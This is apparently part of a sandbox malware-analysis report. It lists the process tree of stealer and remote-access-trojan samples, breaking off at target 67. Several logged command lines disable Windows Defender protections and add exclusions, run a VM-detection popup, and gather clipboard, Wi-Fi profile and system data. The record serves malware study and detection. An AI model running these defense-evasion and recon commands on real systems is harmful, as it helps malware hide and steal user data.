                                                                                                                                                          Start time:17:47:19
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                          Imagebase:0x7ff704090000
                                                                                                                                                          File size:7'242'457 bytes
                                                                                                                                                          MD5 hash:A71FC3CA1BD1AF148EE4C1BFABCBE0DA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000013.00000003.2290157848.0000020710C61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:20
                                                                                                                                                          Start time:17:47:21
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000014.00000003.2292462578.0000025416446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000014.00000003.2289697858.0000025416446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000014.00000003.2285580339.0000025416469000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:21
                                                                                                                                                          Start time:17:47:22
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                                                                          Imagebase:0x7ff61a5b0000
                                                                                                                                                          File size:25'152'315 bytes
                                                                                                                                                          MD5 hash:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:22
                                                                                                                                                          Start time:17:47:22
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:23
                                                                                                                                                          Start time:17:47:23
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:24
                                                                                                                                                          Start time:17:47:23
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                                                                                                                                          Imagebase:0x9a0000
                                                                                                                                                          File size:19'846'974 bytes
                                                                                                                                                          MD5 hash:8198AD352AB70C2C974AB5C716956CD7
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:25
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:26
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:27
                                                                                                                                                          Start time:17:47:26
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
Imagebase: 0x7ff704450000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
Imagebase: 0x7ff6a7080000
File size: 14'848 bytes
MD5 hash: 0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
Imagebase: 0x7ff704450000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 17:47:26
Start date: 09/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 17:47:27
Start date: 09/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
Imagebase: 0x7ff704450000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 38
Start time: 17:47:27
Start date: 09/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 39
Start time: 17:47:27
Start date: 09/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x7ff704450000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 17:47:27
Start date: 09/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase: 0x7ff704450000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 17:47:27
Start date: 09/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 17:47:27
Start date: 09/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:43
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                          Imagebase:0x7ff6ae0f0000
                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:44
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                          Imagebase:0x7ff6ae0f0000
                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:45
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:46
                                                                                                                                                          Start time:17:47:28
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\main.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\main.exe"
                                                                                                                                                          Imagebase:0x16132c30000
                                                                                                                                                          File size:5'872'344 bytes
                                                                                                                                                          MD5 hash:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002E.00000002.2512314562.0000016135011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 66%, ReversingLabs
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:47
                                                                                                                                                          Start time:17:47:30
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:48
                                                                                                                                                          Start time:17:47:30
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:49
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:50
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                          Imagebase:0x7ff667680000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:51
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:52
                                                                                                                                                          Start time:17:47:31
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:17:47:31
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:17:47:32
Start date:09/05/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-Clipboard
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:17:47:32
Start date:09/05/2024
Path:C:\ProgramData\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\svchost.exe"
Imagebase:0x7ff6fb680000
File size:12'576'970 bytes
MD5 hash:48B277A9AC4E729F9262DD9F7055C422
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 42%, ReversingLabs
Has exited:false

Target ID:56
Start time:17:47:33
Start date:09/05/2024
Path:C:\ProgramData\setup.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\setup.exe"
Imagebase:0x7ff758680000
File size:5'617'152 bytes
MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 71%, ReversingLabs
Has exited:true

Target ID:57
Start time:17:47:33
Start date:09/05/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:17:47:33
Start date:09/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:17:47:34
Start date:09/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:17:47:34
Start date:09/05/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff6ae0f0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:17:47:35
Start date:09/05/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6ef0c0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:17:47:35
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:17:47:35
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:17:47:35
Start date:09/05/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:0x7ff704450000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:17:47:35
Start date:09/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:17:47:35
Start date:09/05/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                          Target ID:67
                                                                                                                                                          Start time:17:47:35
                                                                                                                                                          Start date:09/05/2024
